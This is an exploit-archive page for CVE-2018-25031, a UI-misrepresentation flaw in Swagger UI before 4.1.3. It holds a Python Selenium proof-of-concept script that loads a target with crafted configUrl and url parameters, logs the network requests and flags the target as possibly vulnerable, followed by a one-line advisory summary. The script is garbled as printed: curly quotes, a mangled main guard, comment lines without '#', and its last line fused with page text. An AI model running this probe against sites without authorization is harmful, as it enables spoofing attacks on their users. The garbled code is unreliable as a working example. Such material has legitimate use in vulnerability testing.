Headline
Swagger UI 4.1.3 Critical Information Misrepresentation
Swagger UI version 4.1.3 user interface misrepresentation of information proof of concept exploit.
Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
Date: 14 April, 2023
Exploit Author: Rafael Cintra Lopes
Vendor Homepage: https://swagger.io/
Version: < 4.1.3
CVE: CVE-2018-25031
Site: https://rafaelcintralopes.com.br/
Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys
if name == "main":
target = sys.argv[1]
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities[“goog:loggingPrefs”] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_argument(“–headless”)
options.add_argument(“–ignore-certificate-errors”)
options.add_argument(“–log-level=3”)
options.add_experimental_option("excludeSwitches", [“enable-logging”])
Browser webdriver path
drive_service = Service(“C:/chromedriver.exe”)
driver = webdriver.Chrome(service=drive_service,
options=options,
desired_capabilities=desired_capabilities)
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
time.sleep(10)
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
time.sleep(10)
logs = driver.get_log(“performance”)
with open("log_file.json", “w", encoding="utf-8”) as f:
f.write("[")
for log in logs:
log_file = json.loads(log["message"])["message"]
if("Network.response" in log_file["method"]
or "Network.request" in log_file["method"]
or "Network.webSocket" in log_file["method"]):
f.write(json.dumps(log_file)+",")
f.write("{}]")
driver.quit()
json_file_path = “log_file.json”
with open(json_file_path, “r", encoding="utf-8”) as f:
logs = json.loads(f.read())
for log in logs:
try:
url = log[“params”][“request”][“url”]
if(url == "https://petstore.swagger.io/v2/hacked1.json"):
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
if(url == "https://petstore.swagger.io/v2/hacked2.json"):
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
except Exception as e:
passRelated news
Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.